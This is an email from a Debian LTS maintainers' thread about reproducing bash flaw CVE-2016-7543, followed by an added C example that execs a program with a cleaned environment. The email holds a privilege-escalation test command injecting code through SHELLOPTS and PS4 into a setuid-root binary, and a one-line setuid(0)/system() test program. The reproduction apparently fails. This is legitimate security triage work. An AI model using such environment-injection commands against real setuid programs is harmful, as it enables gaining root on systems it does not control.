Hi Matthias and Balint

I have tried to reproduce the problem described in the openwall email.
However, I cannot reproduce it. Have you been able to?

On wheezy:
------------
ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct  6 20:54:07 UTC 2016
ola@tigereye:/$ ls -la test
-rwsr-xr-x 1 root root 6824 Oct  6 20:52 test
ola@tigereye:/$ dpkg -l bash
...CUT...
ii  bash           4.2+dfsg-0.1 amd64        GNU Bourne Again SHell

On jessie:
ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct  6 22:48:35 CEST 2016
ola@tigereye:~/exploit$ dpkg -l bash
...CUT...
ii  bash           4.3-11+b1    amd64        GNU Bourne Again SHell

I think it may be because SHELLOPTS is a read-only variable.

ola@tigereye:~/exploit$ SHELLOPTS=xtrace
bash: SHELLOPTS: readonly variable

Do you think I have made a mistake in the reproduction, or is it so that the
patch was actually not for a real problem (at least in Debian)?

Not even if I change the code like this:
ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
system("/bin/bash -c /bin/date"); }'
ola@tigereye:~/exploit$ ./test2
Thu Oct  6 23:04:11 CEST 2016
ola@tigereye:~/exploit$ set -x
ola@tigereye:~/exploit$ ./test2
uid=1000(ola) gid=1000(ola)
groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
Thu Oct  6 23:04:18 CEST 2016

My conclusion is that there is no security hole. But I may be mistaken.

Can anyone else reproduce the issue?

Best regards,

// Ola

On 6 October 2016 at 12:29, Ola Lundqvist <[email protected]> wrote:

> Hi Matthias
>
> I will look into this.
>
> // Ola
>
> On 6 October 2016 at 01:06, Matthias Klose <[email protected]> wrote:
>
>> On 05.10.2016 16:02, Balint Reczey wrote:
>> > Hello dear maintainer(s),
>> >
>> > the Debian LTS team would like to fix the security issues which are
>> > currently open in the Wheezy version of bash:
>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >
>> > Would you like to take care of this yourself?
>>
>> please go ahead.
>>
>> Matthias
>>
>>
>
>
> --
>  --- Inguza Technology AB --- MSc in Information Technology ----
> /  [email protected]                    Folkebogatan 26            \
> |  [email protected]                   654 68 KARLSTAD            |
> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>  ---------------------------------------------------------------
>
>


-- 
 --- Inguza Technology AB --- MSc in Information Technology ----
/  [email protected]                    Folkebogatan 26            \
|  [email protected]                   654 68 KARLSTAD            |
|  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
 ---------------------------------------------------------------
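Added example, not part of the thread or of any Debian patch: a hardened counterpart to the test2 program above, which calls system("/bin/bash -c /bin/date") and so hands the caller's whole environment to a shell. This version execs /bin/date directly with an allowlisted environment; the allowlist (TZ, LANG, TERM), the fixed PATH, and the function names are assumptions chosen for illustration, and privilege handling (setuid) is left out to focus on the environment.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Variables allowed through to the child (assumed policy for this example). */
static const char *const ALLOWED[] = { "TZ", "LANG", "TERM" };

/* Return 1 if entry ("NAME=value") names exactly one allowlisted variable. */
static int env_allowed(const char *entry) {
    for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++) {
        size_t n = strlen(ALLOWED[i]);
        if (strncmp(entry, ALLOWED[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Write a fixed PATH plus the allowlisted entries of in[] to out[];
 * everything else (SHELLOPTS, PS4, BASH_ENV, ...) is dropped.
 * Returns the number of entries written, excluding the NULL terminator. */
size_t build_clean_env(char *const in[], char *out[], size_t max) {
    size_t k = 0;
    if (max < 2) { if (max) out[0] = NULL; return 0; }
    out[k++] = "PATH=/usr/bin:/bin";
    for (size_t i = 0; in && in[i] && k + 1 < max; i++)
        if (env_allowed(in[i]))
            out[k++] = in[i];
    out[k] = NULL;
    return k;
}

/* Run /bin/date without a shell, using the clean environment.
 * Returns the child's exit status, or -1 on failure. */
int run_date(char *const envp[]) {
    char *clean[16];
    char *const argv[] = { "date", NULL };
    int status;
    build_clean_env(envp, clean, 16);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve("/bin/date", argv, clean); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    extern char **environ;
    return run_date(environ);
}
```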
